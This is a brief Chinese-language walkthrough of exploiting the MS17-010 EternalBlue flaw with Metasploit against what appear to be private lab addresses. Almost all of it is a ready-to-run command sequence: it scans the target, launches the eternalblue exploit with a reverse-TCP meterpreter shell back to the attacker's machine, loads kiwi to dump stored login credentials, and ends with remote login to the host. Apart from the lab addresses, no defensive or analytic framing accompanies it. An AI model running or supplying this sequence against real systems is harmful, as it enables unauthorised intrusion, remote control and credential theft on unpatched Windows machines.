MSF永恒之蓝MS17-010

1. 扫描

use auxiliary/scanner/smb/smb_ms17_010（加载模块扫描exp）

set RHOSTS 192.168.167.60（设置被扫描ip）

run（开始扫描，查看是否存在）

检测到可以使用永恒之蓝

2.

use exploit/windows/smb/ms17_010_eternalblue（加载模块）

set RHOSTS 192.168.167.60（IP）

set LHOST 192.168.167.48 （设置本机IP）

set LPORT 4444 （设置连接端口）

set payload windows/x64/meterpreter/reverse_tcp （设置payload） run （开始）

显示IP＋端口＞＞＞目标IP＋端口（反弹成功）

shell（拿到权限）

3. 获取登录用户名密码

meterpreter > load kiwi

meterpreter > creds_msv

meterpreter > creds_wdigest

拿到登录密码

4. 下面就可以远程登录目标主机了